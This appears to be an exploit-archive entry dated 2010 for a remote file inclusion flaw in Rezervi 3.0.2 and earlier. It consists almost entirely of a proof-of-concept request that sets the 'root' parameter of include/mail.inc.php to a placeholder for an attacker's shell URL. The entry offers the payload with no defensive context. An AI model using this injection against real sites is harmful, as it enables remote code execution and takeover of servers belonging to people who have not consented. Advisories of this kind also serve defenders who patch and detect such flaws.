id: 10580
date: 01/03/2010
title: Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerability
author: r00t.h4x0r
cves: 

=================================================
Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerability
=================================================

###############################################################
##     Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerablities    ##
##                  http://www.rezervi.com                   ##
############################################################### 

###############################################################
PoC r00t :
 
[r00t.h4x0r]/include/mail.inc.php?root=[Shell]
 
###############################################################



#  0day.today [2023-03-22]  #